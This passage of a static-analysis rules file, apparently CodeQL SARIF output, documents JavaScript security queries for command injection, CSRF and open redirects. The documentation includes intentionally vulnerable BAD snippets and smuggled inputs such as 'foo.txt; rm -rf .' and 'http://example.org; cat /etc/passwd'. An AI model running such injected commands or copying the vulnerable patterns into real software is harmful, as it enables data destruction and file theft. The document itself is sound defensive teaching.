Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that the user input string is safe before using it.\n\n\n## Example\nThe following example shows code that extracts a filename from an HTTP query parameter that may contain untrusted data, and then embeds it into a shell command to count its lines without examining it first:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execSync(`wc -l ${file}`); // BAD\n});\n\n```\nA malicious user can take advantage of this code by executing arbitrary shell commands. For example, by providing a filename like `foo.txt; rm -rf .`, the user can first count the lines in `foo.txt` and subsequently delete all files in the current directory.\n\nTo avoid this catastrophic behavior, use an API such as `child_process.execFileSync` that does not spawn a shell by default:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execFileSync('wc', ['-l', file]); // GOOD\n});\n\n```\nIf you want to allow the user to specify other options to `wc`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url'),\n shellQuote = require('shell-quote');\n\nvar server = http.createServer(function(req, res) {\n let options = url.parse(req.url, true).query.options;\n\n cp.execFileSync('wc', shellQuote.parse(options)); // GOOD\n});\n\n```\nAlternatively, the original example can be made safe by checking the filename against an allowlist of safe characters before 
using it:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n // only allow safe characters in file name\n if (file.match(/^[\\w\\.\\-\\/]+$/)) {\n cp.execSync(`wc -l ${file}`); // GOOD\n }\n});\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Uncontrolled command line\nCode that passes untrusted user input directly to `child_process.exec` or similar APIs that execute shell commands allows the user to execute malicious code.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and that accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. 
Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that the user input string is safe before using it.\n\n\n## Example\nThe following example shows code that extracts a filename from an HTTP query parameter that may contain untrusted data, and then embeds it into a shell command to count its lines without examining it first:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execSync(`wc -l ${file}`); // BAD\n});\n\n```\nA malicious user can take advantage of this code by executing arbitrary shell commands. For example, by providing a filename like `foo.txt; rm -rf .`, the user can first count the lines in `foo.txt` and subsequently delete all files in the current directory.\n\nTo avoid this catastrophic behavior, use an API such as `child_process.execFileSync` that does not spawn a shell by default:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execFileSync('wc', ['-l', file]); // GOOD\n});\n\n```\nIf you want to allow the user to specify other options to `wc`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url'),\n shellQuote = require('shell-quote');\n\nvar server = http.createServer(function(req, res) {\n let options = url.parse(req.url, true).query.options;\n\n cp.execFileSync('wc', shellQuote.parse(options)); // GOOD\n});\n\n```\nAlternatively, the original example can be made safe by checking the filename against an allowlist of safe characters before 
using it:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n // only allow safe characters in file name\n if (file.match(/^[\\w\\.\\-\\/]+$/)) {\n cp.execSync(`wc -l ${file}`); // GOOD\n }\n});\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Using externally controlled strings in a command line may allow a malicious\n user to change the meaning of the command.", + "id" : "js/command-line-injection", + "kind" : "path-problem", + "name" : "Uncontrolled command line", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.8" + } + }, { + "id" : "js/unnecessary-use-of-cat", + "name" : "js/unnecessary-use-of-cat", + "shortDescription" : { + "text" : "Unnecessary use of `cat` process" + }, + "fullDescription" : { + "text" : "Using the `cat` process to read a file is unnecessarily complex, inefficient, unportable, and can lead to subtle bugs, or even security vulnerabilities." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Unnecessary use of `cat` process\nUsing the unix command `cat` only to read a file is an unnecessarily complex way to achieve something that can be done in a simpler and safer manner using the Node.js `fs.readFile` API.\n\nThe use of `cat` for simple file reads leads to code that is unportable, inefficient, complex, and can lead to subtle bugs or even security vulnerabilities.\n\n\n## Recommendation\nUse `fs.readFile` or `fs.readFileSync` to read files from the file system.\n\n\n## Example\nThe following example shows code that reads a file using `cat`:\n\n\n```javascript\nvar child_process = require('child_process');\n\nmodule.exports = function (name) {\n return child_process.execSync(\"cat \" + name).toString();\n};\n\n```\nThe code in the example will break if the input `name` contains special characters (including space). Additionally, it does not work on Windows and if the input is user-controlled, a command injection attack can happen.\n\nThe `fs.readFile` API should be used to avoid these potential issues:\n\n\n```javascript\nvar fs = require('fs');\n\nmodule.exports = function (name) {\n return fs.readFileSync(name).toString();\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Node.js: [File System API](https://nodejs.org/api/fs.html).\n* [The Useless Use of Cat Award](http://porkmail.org/era/unix/award.html#cat).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n", + "markdown" : "# Unnecessary use of `cat` process\nUsing the unix command `cat` only to read a file is an unnecessarily complex way to achieve something that can be done in a simpler and safer manner using the Node.js `fs.readFile` API.\n\nThe use of `cat` for simple file reads leads to code that is unportable, inefficient, complex, and can lead to subtle bugs or even security 
vulnerabilities.\n\n\n## Recommendation\nUse `fs.readFile` or `fs.readFileSync` to read files from the file system.\n\n\n## Example\nThe following example shows code that reads a file using `cat`:\n\n\n```javascript\nvar child_process = require('child_process');\n\nmodule.exports = function (name) {\n return child_process.execSync(\"cat \" + name).toString();\n};\n\n```\nThe code in the example will break if the input `name` contains special characters (including space). Additionally, it does not work on Windows and if the input is user-controlled, a command injection attack can happen.\n\nThe `fs.readFile` API should be used to avoid these potential issues:\n\n\n```javascript\nvar fs = require('fs');\n\nmodule.exports = function (name) {\n return fs.readFileSync(name).toString();\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Node.js: [File System API](https://nodejs.org/api/fs.html).\n* [The Useless Use of Cat Award](http://porkmail.org/era/unix/award.html#cat).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "maintainability", "external/cwe/cwe-078" ], + "description" : "Using the `cat` process to read a file is unnecessarily complex, inefficient, unportable, and can lead to subtle bugs, or even security vulnerabilities.", + "id" : "js/unnecessary-use-of-cat", + "kind" : "problem", + "name" : "Unnecessary use of `cat` process", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.3" + } + }, { + "id" : "js/shell-command-constructed-from-input", + "name" : "js/shell-command-constructed-from-input", + "shortDescription" : { + "text" : "Unsafe shell command constructed from library input" + }, + "fullDescription" : { + "text" : "Using externally controlled strings in a command line may allow a malicious user to change the meaning of the command." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Unsafe shell command constructed from library input\nDynamically constructing a shell command with inputs from exported functions may inadvertently change the meaning of the shell command. Clients using the exported function may use inputs containing characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, provide the dynamic arguments to the shell as an array using a safe API such as `child_process.execFile` to avoid interpretation by the shell.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nAlternatively, if the command must be interpreted by a shell (for example because it includes I/O redirections), you can use `shell-quote` to escape any special characters in the input before embedding it in the command.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that downloads a file from a remote URL.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path, callback);\n}\n\n```\nThe shell command will, however, fail to work as intended if the input contains spaces or other special characters interpreted in a special way by the shell.\n\nEven worse, a client might pass in user-controlled data, not knowing that the input is interpreted as a shell command. 
This could allow a malicious user to provide the input `http://example.org; cat /etc/passwd` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the inputs from exported functions as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.execFile(\"wget\", [path], callback);\n}\n\n```\nAs another example, consider the following code which is similar to the preceding example, but pipes the output of `wget` into `wc -l` to count the number of lines in the downloaded file.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path + \" | wc -l\", callback);\n};\n\n```\nIn this case, using `child_process.execFile` is not an option because the shell is needed to interpret the pipe operator. Instead, you can use `shell-quote` to escape the input before embedding it in the command:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + shellQuote.quote([path]) + \" | wc -l\", callback);\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Unsafe shell command constructed from library input\nDynamically constructing a shell command with inputs from exported functions may inadvertently change the meaning of the shell command. Clients using the exported function may use inputs containing characters that the shell interprets in a special way, for instance quotes and spaces. 
This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, provide the dynamic arguments to the shell as an array using a safe API such as `child_process.execFile` to avoid interpretation by the shell.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nAlternatively, if the command must be interpreted by a shell (for example because it includes I/O redirections), you can use `shell-quote` to escape any special characters in the input before embedding it in the command.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that downloads a file from a remote URL.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path, callback);\n}\n\n```\nThe shell command will, however, fail to work as intended if the input contains spaces or other special characters interpreted in a special way by the shell.\n\nEven worse, a client might pass in user-controlled data, not knowing that the input is interpreted as a shell command. 
This could allow a malicious user to provide the input `http://example.org; cat /etc/passwd` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the inputs from exported functions as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.execFile(\"wget\", [path], callback);\n}\n\n```\nAs another example, consider the following code which is similar to the preceding example, but pipes the output of `wget` into `wc -l` to count the number of lines in the downloaded file.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path + \" | wc -l\", callback);\n};\n\n```\nIn this case, using `child_process.execFile` is not an option because the shell is needed to interpret the pipe operator. Instead, you can use `shell-quote` to escape the input before embedding it in the command:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + shellQuote.quote([path]) + \" | wc -l\", callback);\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Using externally controlled strings in a command line may allow a malicious\n user to change the meaning of the command.", + "id" : "js/shell-command-constructed-from-input", + "kind" : "path-problem", + "name" : "Unsafe shell command constructed from library input", + 
"precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.3" + } + }, { + "id" : "js/sensitive-get-query", + "name" : "js/sensitive-get-query", + "shortDescription" : { + "text" : "Sensitive data read from GET request" + }, + "fullDescription" : { + "text" : "Placing sensitive data in a GET request increases the risk of the data being exposed to an attacker." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Sensitive data read from GET request\nSensitive information such as user passwords should not be transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing sensitive information into the URL therefore increases the risk that it will be captured by an attacker.\n\n\n## Recommendation\nUse HTTP POST to send sensitive information as part of the request body; for example, as form data.\n\n\n## Example\nThe following example shows two route handlers that both receive a username and a password. The first receives this sensitive information from the query parameters of a GET request, which is transmitted in the URL. 
The second receives this sensitive information from the request body of a POST request.\n\n\n```javascript\nconst express = require('express');\nconst app = express();\napp.use(require('body-parser').urlencoded({ extended: false }))\n\n// bad: sensitive information is read from query parameters\napp.get('/login1', (req, res) => {\n const user = req.query.user;\n const password = req.query.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n// good: sensitive information is read from post body\napp.post('/login2', (req, res) => {\n const user = req.body.user;\n const password = req.body.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n```\n\n## References\n* CWE: [CWE-598: Use of GET Request Method with Sensitive Query Strings](https://cwe.mitre.org/data/definitions/598.html)\n* PortSwigger (Burp): [Password Submitted using GET Method](https://portswigger.net/kb/issues/00400300_password-submitted-using-get-method)\n* OWASP: [Information Exposure through Query Strings in URL](https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url)\n* Common Weakness Enumeration: [CWE-598](https://cwe.mitre.org/data/definitions/598.html).\n", + "markdown" : "# Sensitive data read from GET request\nSensitive information such as user passwords should not be transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. 
Placing sensitive information into the URL therefore increases the risk that it will be captured by an attacker.\n\n\n## Recommendation\nUse HTTP POST to send sensitive information as part of the request body; for example, as form data.\n\n\n## Example\nThe following example shows two route handlers that both receive a username and a password. The first receives this sensitive information from the query parameters of a GET request, which is transmitted in the URL. The second receives this sensitive information from the request body of a POST request.\n\n\n```javascript\nconst express = require('express');\nconst app = express();\napp.use(require('body-parser').urlencoded({ extended: false }))\n\n// bad: sensitive information is read from query parameters\napp.get('/login1', (req, res) => {\n const user = req.query.user;\n const password = req.query.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n// good: sensitive information is read from post body\napp.post('/login2', (req, res) => {\n const user = req.body.user;\n const password = req.body.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n```\n\n## References\n* CWE: [CWE-598: Use of GET Request Method with Sensitive Query Strings](https://cwe.mitre.org/data/definitions/598.html)\n* PortSwigger (Burp): [Password Submitted using GET Method](https://portswigger.net/kb/issues/00400300_password-submitted-using-get-method)\n* OWASP: [Information Exposure through Query Strings in URL](https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url)\n* Common Weakness Enumeration: [CWE-598](https://cwe.mitre.org/data/definitions/598.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-598" ], + "description" : "Placing sensitive data in a GET request increases the risk of\n the data being exposed to an attacker.", + "id" : 
"js/sensitive-get-query", + "kind" : "problem", + "name" : "Sensitive data read from GET request", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.5" + } + }, { + "id" : "js/missing-token-validation", + "name" : "js/missing-token-validation", + "shortDescription" : { + "text" : "Missing CSRF middleware" + }, + "fullDescription" : { + "text" : "Using cookies without CSRF protection may allow malicious websites to submit requests on behalf of the user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Missing CSRF middleware\nWebsites that rely on cookie-based authentication may be vulnerable to cross-site request forgery (CSRF). Specifically, a state-changing request should include a secret token so the request can't be forged by an attacker. Otherwise, unwanted requests can be submitted on behalf of a user who visits a malicious website.\n\nThis is typically mitigated by embedding a session-specific secret token in each request. This token is then checked as an additional authentication measure. A malicious website should have no way of guessing the correct token to embed in the request.\n\n\n## Recommendation\nUse a middleware package such as `lusca.csrf` to protect against CSRF attacks.\n\n\n## Example\nIn the example below, the server authenticates users before performing the `changeEmail` POST action:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\");\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\nThis is not secure. 
An attacker can submit a POST `changeEmail` request on behalf of a user who visited a malicious website. Since authentication happens without any action from the user, the `changeEmail` action would be executed, despite not being initiated by the user.\n\nThis vulnerability can be mitigated by installing a CSRF protecting middleware handler:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\"),\n csrf = require('lusca').csrf;\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\napp.use(csrf());\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\n\n## References\n* OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))\n* NPM: [lusca](https://www.npmjs.com/package/lusca)\n* Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n", + "markdown" : "# Missing CSRF middleware\nWebsites that rely on cookie-based authentication may be vulnerable to cross-site request forgery (CSRF). Specifically, a state-changing request should include a secret token so the request can't be forged by an attacker. Otherwise, unwanted requests can be submitted on behalf of a user who visits a malicious website.\n\nThis is typically mitigated by embedding a session-specific secret token in each request. This token is then checked as an additional authentication measure. 
A malicious website should have no way of guessing the correct token to embed in the request.\n\n\n## Recommendation\nUse a middleware package such as `lusca.csrf` to protect against CSRF attacks.\n\n\n## Example\nIn the example below, the server authenticates users before performing the `changeEmail` POST action:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\");\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\nThis is not secure. An attacker can submit a POST `changeEmail` request on behalf of a user who visited a malicious website. Since authentication happens without any action from the user, the `changeEmail` action would be executed, despite not being initiated by the user.\n\nThis vulnerability can be mitigated by installing a CSRF protecting middleware handler:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\"),\n csrf = require('lusca').csrf;\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\napp.use(csrf());\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... 
update email associated with userId\n});\n\n```\n\n## References\n* OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))\n* NPM: [lusca](https://www.npmjs.com/package/lusca)\n* Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-352" ], + "description" : "Using cookies without CSRF protection may allow malicious websites to\n submit requests on behalf of the user.", + "id" : "js/missing-token-validation", + "kind" : "problem", + "name" : "Missing CSRF middleware", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "8.8" + } + }, { + "id" : "js/server-side-unvalidated-url-redirection", + "name" : "js/server-side-unvalidated-url-redirection", + "shortDescription" : { + "text" : "Server-side URL redirect" + }, + "fullDescription" : { + "text" : "Server-side URL redirection based on unvalidated user input may cause redirection to malicious web sites." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Server-side URL redirect\nDirectly incorporating user input into a URL redirect request without validating the input can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. 
Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\nIf this is not possible, then the user input should be validated in some other way, for example, by verifying that the target URL is on the same host as the current page.\n\n\n## Example\nThe following example shows an HTTP request parameter being used directly in a URL redirect without validating the input, which facilitates phishing attacks:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"/redirect\", function (req, res) {\n // BAD: a request parameter is incorporated without validation into a URL redirect\n res.redirect(req.query[\"target\"]);\n});\n\n```\nOne way to remedy the problem is to validate the user input against a known fixed string before doing the redirection:\n\n\n```javascript\nconst app = require(\"express\")();\n\nconst VALID_REDIRECT = \"http://cwe.mitre.org/data/definitions/601.html\";\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: the request parameter is validated against a known fixed string\n let target = req.query[\"target\"];\n if (VALID_REDIRECT === target) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nAlternatively, we can check that the target URL does not redirect to a different host by parsing it relative to a base URL with a known host and verifying that the host stays the same:\n\n\n```javascript\nconst app = require(\"express\")();\n\nfunction isLocalUrl(path) {\n try {\n return (\n // TODO: consider substituting your own domain for example.com\n new URL(path, \"https://example.com\").origin === \"https://example.com\"\n );\n } catch (e) {\n return false;\n }\n}\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: check that we don't redirect to a different host\n let target = req.query[\"target\"];\n if (isLocalUrl(target)) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nNote that as written, the above 
code will allow redirects to URLs on `example.com`, which is harmless but perhaps not intended. You can substitute your own domain (if known) for `example.com` to prevent this.\n\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n", + "markdown" : "# Server-side URL redirect\nDirectly incorporating user input into a URL redirect request without validating the input can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\nIf this is not possible, then the user input should be validated in some other way, for example, by verifying that the target URL is on the same host as the current page.\n\n\n## Example\nThe following example shows an HTTP request parameter being used directly in a URL redirect without validating the input, which facilitates phishing attacks:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"/redirect\", function (req, res) {\n // BAD: a request parameter is incorporated without validation into a URL redirect\n res.redirect(req.query[\"target\"]);\n});\n\n```\nOne way to remedy the problem is to validate the user input against a known fixed string before doing the redirection:\n\n\n```javascript\nconst app = require(\"express\")();\n\nconst VALID_REDIRECT = \"http://cwe.mitre.org/data/definitions/601.html\";\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: the request parameter is 
validated against a known fixed string\n let target = req.query[\"target\"];\n if (VALID_REDIRECT === target) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nAlternatively, we can check that the target URL does not redirect to a different host by parsing it relative to a base URL with a known host and verifying that the host stays the same:\n\n\n```javascript\nconst app = require(\"express\")();\n\nfunction isLocalUrl(path) {\n try {\n return (\n // TODO: consider substituting your own domain for example.com\n new URL(path, \"https://example.com\").origin === \"https://example.com\"\n );\n } catch (e) {\n return false;\n }\n}\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: check that we don't redirect to a different host\n let target = req.query[\"target\"];\n if (isLocalUrl(target)) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nNote that as written, the above code will allow redirects to URLs on `example.com`, which is harmless but perhaps not intended. 
You can substitute your own domain (if known) for `example.com` to prevent this.\n\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-601" ], + "description" : "Server-side URL redirection based on unvalidated user input\n may cause redirection to malicious web sites.", + "id" : "js/server-side-unvalidated-url-redirection", + "kind" : "path-problem", + "name" : "Server-side URL redirect", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/client-side-unvalidated-url-redirection", + "name" : "js/client-side-unvalidated-url-redirection", + "shortDescription" : { + "text" : "Client-side URL redirect" + }, + "fullDescription" : { + "text" : "Client-side URL redirection based on unvalidated user input may cause redirection to malicious web sites." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side URL redirect\nRedirecting to a URL that is constructed from parts of the DOM that may be controlled by an attacker can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. 
Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\n\n## Example\nThe following example uses a regular expression to extract a query parameter from the document URL, and then uses it to construct a new URL to redirect to without any further validation. This may allow an attacker to craft a link that redirects from a trusted website to some arbitrary website of their choosing, which facilitates phishing attacks:\n\n\n```javascript\nwindow.location = /.*redirect=([^&]*).*/.exec(document.location.href)[1];\n\n```\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n", + "markdown" : "# Client-side URL redirect\nRedirecting to a URL that is constructed from parts of the DOM that may be controlled by an attacker can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\n\n## Example\nThe following example uses a regular expression to extract a query parameter from the document URL, and then uses it to construct a new URL to redirect to without any further validation. 
